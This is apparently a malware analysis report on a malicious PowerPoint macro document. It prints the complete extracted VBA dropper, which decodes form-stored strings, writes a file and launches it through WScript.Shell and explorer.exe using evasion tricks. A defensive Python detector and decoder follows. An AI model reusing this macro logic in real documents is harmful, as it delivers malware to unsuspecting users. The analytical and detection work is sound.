Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 98e4b84951dc8e72…

MALICIOUS

Office (OOXML)

Size: 29.3 KB
First seen: 2021-10-04
MD5: e6a75d5b92bf1c6012282c9916b574a9
SHA-1: 2275a407952c5fe9bda68a210a1fb6130cd3aa04
SHA-256: 98e4b84951dc8e72fe516d6713213b3b549c0967ed11b74d670e3fac70f2c715
Risk score: 260

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The sample is an OOXML document whose VBA project is stored at ppt/vbaProject.bin, i.e. a PowerPoint container, and the project has three components. The module Atletico defines aUtO_oPeN (mixed case, which defeats case-sensitive matching on "Auto_Open") and does nothing except show the UserForm Moushe. The form's UserForm_Terminate handler calls Ubbos on an instance of the class Contado, so the dropper logic runs only when the form is closed, a technique that defers execution until the user (or an analyst) dismisses the dialog. Ubbos reads two obfuscated strings from the form control Lechuza, its Tag (the output path) and its ControlTipText (the file content), decodes each with Cebra, which is a Replace that deletes every occurrence of the junk marker ":4[t6};({Nt2/&un%8+}z[7N&b}b:q", and writes the decoded content to the decoded path with Open ... For Output and Print #1. It then calls AppActivate "Microsoft PowerPoint Services..." under On Error Resume Next and, only if no such window exists, creates a WScript.Shell object and calls Exec on "C:\Windows\Explorer " followed by the dropped path, which makes the shell open the dropped file according to its extension. The second stage is therefore delivered by a file write plus explorer.exe, not by a download from the macro itself. Three caveats for the reader: the dropped path and content are not in macros.bas, because they are properties of a form control kept in the form storage inside vbaProject.bin, so the actual second stage must be recovered from that stream (olevba can report such values as VBA form strings); the extracted source contains no Shell() function call, the shell execution is WScript.Shell.Exec, so the OLE_VBA_SHELL finding should be read in that light; and Auto_Open is an automatic macro name in Word and Excel but not in a PowerPoint presentation, so how the macro is triggered in this container is not established by the source alone.

Heuristics (6)

  • VBA project inside OOXML (medium, 5 related findings) OOXML_VBA
    Document contains a VBA project: VBA macros present
  • Shell() call in VBA (critical) OLE_VBA_SHELL
  • WScript.Shell usage (critical) OLE_VBA_WSCRIPT
  • Auto_Open macro (high) OLE_VBA_AUTO
  • CreateObject call (high) OLE_VBA_CREATEOBJ
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1550 bytes
SHA-256: ad862f65b72d8dbe55ac0e68fc21dbee933362dbb186e6663fe569ab8121f572
Script preview (first 1,000 lines of the extracted script)
Attribute VB_Name = "Atletico"




Public Sub aUtO_oPeN()

Moushe.Show

End Sub



Attribute VB_Name = "Moushe"
Attribute VB_Base = "0{0DCD7515-314E-46BB-BB44-4762087DBB18}{DB0CD6ED-8AA6-4B31-ACE4-F991E3E40875}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False




Public Nonhes As New Contado

Private Sub UserForm_Terminate()

Nonhes.Ubbos

End Sub




Attribute VB_Name = "Contado"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False




Public Function Cebra(Cabra)

Cebra = Replace(Cabra, ":4[t6};({Nt2/&un%8+}z[7N&b}b:q", "")

End Function



Sub Ubbos()


Dim Polhen As String: Polhen = Moushe.Lechuza.Tag


Dim Pesguisas As String: Pesguisas = Cebra(Polhen)
Open Pesguisas For Output As #1


Dim Cohelho As String: Cohelho = Moushe.Lechuza.ControlTipText


Dim Savonhes As String: Savonhes = Cebra(Cohelho)
Print #1, Savonhes
Close



On Error Resume Next
AppActivate "Microsoft PowerPoint Services..."
If Err <> 0 Then
Err = 0


Set Ana = CreateObject("WScript.Shell")

Set Gold = Ana.exEc("C:\Windows\Explorer " & Pesguisas)


If Err <> 0 Then MsgBox "Can't Stop "
End If


End Sub
vbaProject_00.bin | vba-project | OOXML VBA project: ppt/vbaProject.bin | 53760 bytes
SHA-256: 67b86d4387ff750776943cc44d1c9c2ea784f6e4b3d2b6a38e934291e4338c4d
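The following is an added example, not code from the report, from oletools, or from the sample; it works on the extracted macro text quoted above rather than on the OOXML file. It covers two things the heuristics list and the script preview describe in prose: it matches case-insensitive indicators of the same kind as the listed rules (auto-exec name, UserForm_Terminate, Open ... For Output, CreateObject("WScript.Shell"), .Exec, the Explorer launch, the AppActivate check) against the VBA source, and it recovers the junk marker from the Replace(..., "<key>", "") call and applies the same deletion to strings taken from the form. The real Tag and ControlTipText values are not on the page, so the strings decoded in the usage section are constructed stand-ins, and the indicator names and function names are this example's own.

```python
"""Added example; not code from the report, the sample, or oletools.
Reproduces the Cebra() decoder from the extracted macro and flags the
write-then-execute chain, working purely on VBA source text."""
import re
from typing import Dict, List

# Constructed excerpt of the macros.bas source shown in the report.
MACRO_SRC = r'''
Public Sub aUtO_oPeN()
Moushe.Show
End Sub
Private Sub UserForm_Terminate()
Nonhes.Ubbos
End Sub
Public Function Cebra(Cabra)
Cebra = Replace(Cabra, ":4[t6};({Nt2/&un%8+}z[7N&b}b:q", "")
End Function
Sub Ubbos()
Dim Polhen As String: Polhen = Moushe.Lechuza.Tag
Dim Pesguisas As String: Pesguisas = Cebra(Polhen)
Open Pesguisas For Output As #1
Dim Cohelho As String: Cohelho = Moushe.Lechuza.ControlTipText
Dim Savonhes As String: Savonhes = Cebra(Cohelho)
Print #1, Savonhes
Close
On Error Resume Next
AppActivate "Microsoft PowerPoint Services..."
If Err <> 0 Then
Err = 0
Set Ana = CreateObject("WScript.Shell")
Set Gold = Ana.exEc("C:\Windows\Explorer " & Pesguisas)
If Err <> 0 Then MsgBox "Can't Stop "
End If
End Sub
'''

# Replace(x, "<junk>", "") with an empty replacement is the "delete the junk
# marker" decoder. VBA string literals double embedded quotes; the key in this
# sample contains none, so [^"]* is sufficient.
REPLACE_KEY = re.compile(r'\bReplace\s*\(\s*[^,()]+,\s*"([^"]*)"\s*,\s*""\s*\)', re.I)

# VBA identifiers are case-insensitive, so aUtO_oPeN and exEc must still hit.
# The indicator names are this example's own, not the report's rule ids.
INDICATORS: Dict[str, re.Pattern] = {
    "auto_open": re.compile(r"\bSub\s+Auto_Open\b", re.I),
    "userform_terminate": re.compile(r"\bSub\s+UserForm_Terminate\b", re.I),
    "file_write": re.compile(r"\bOpen\b[^\n]+\bFor\s+Output\b", re.I),
    "wscript_shell": re.compile(r'CreateObject\s*\(\s*"WScript\.Shell"\s*\)', re.I),
    "exec_call": re.compile(r"\.\s*Exec\s*\(", re.I),
    "explorer_launch": re.compile(r'Explorer\s*"\s*&', re.I),
    "appactivate_check": re.compile(r"\bAppActivate\b", re.I),
}


def extract_replace_keys(src: str) -> List[str]:
    """Return every junk marker deleted by a Replace(..., "<key>", "") call."""
    return REPLACE_KEY.findall(src)


def decode(obfuscated: str, key: str) -> str:
    """Equivalent of Cebra(): VBA Replace with the default vbBinaryCompare is a
    case-sensitive literal substitution, which str.replace reproduces."""
    return obfuscated.replace(key, "")


def triage(src: str) -> Dict[str, bool]:
    """Which parts of the drop-then-execute chain appear in the source."""
    return {name: bool(rx.search(src)) for name, rx in INDICATORS.items()}


def decode_form_strings(src: str, form_strings: Dict[str, str]) -> Dict[str, str]:
    """Apply every recovered key to strings pulled from the UserForm storage
    (Tag, ControlTipText, ...), which the extracted source does not contain."""
    keys = extract_replace_keys(src)
    out = {}
    for prop, value in form_strings.items():
        for key in keys:
            value = decode(value, key)
        out[prop] = value
    return out


if __name__ == "__main__":
    key = extract_replace_keys(MACRO_SRC)[0]
    # Constructed stand-ins: the real Tag/ControlTipText values live in the
    # form storage inside ppt/vbaProject.bin and are not shown in the report.
    constructed = {
        "Tag": "C:\\Users\\Pu" + key + "blic\\drop" + key + ".txt",
        "ControlTipText": "const" + key + "ructed second-stage text",
    }
    print(decode_form_strings(MACRO_SRC, constructed))
    for name, hit in triage(MACRO_SRC).items():
        print(f"{name:20s} {'HIT' if hit else '-'}")
```

To run this against a real document, feed `triage` and `extract_replace_keys` the source olevba extracts, and feed `decode_form_strings` the form-string values recovered from the vbaProject.bin form storage; the decoded Tag is the path to look for on disk and the decoded ControlTipText is the file explorer.exe was asked to open.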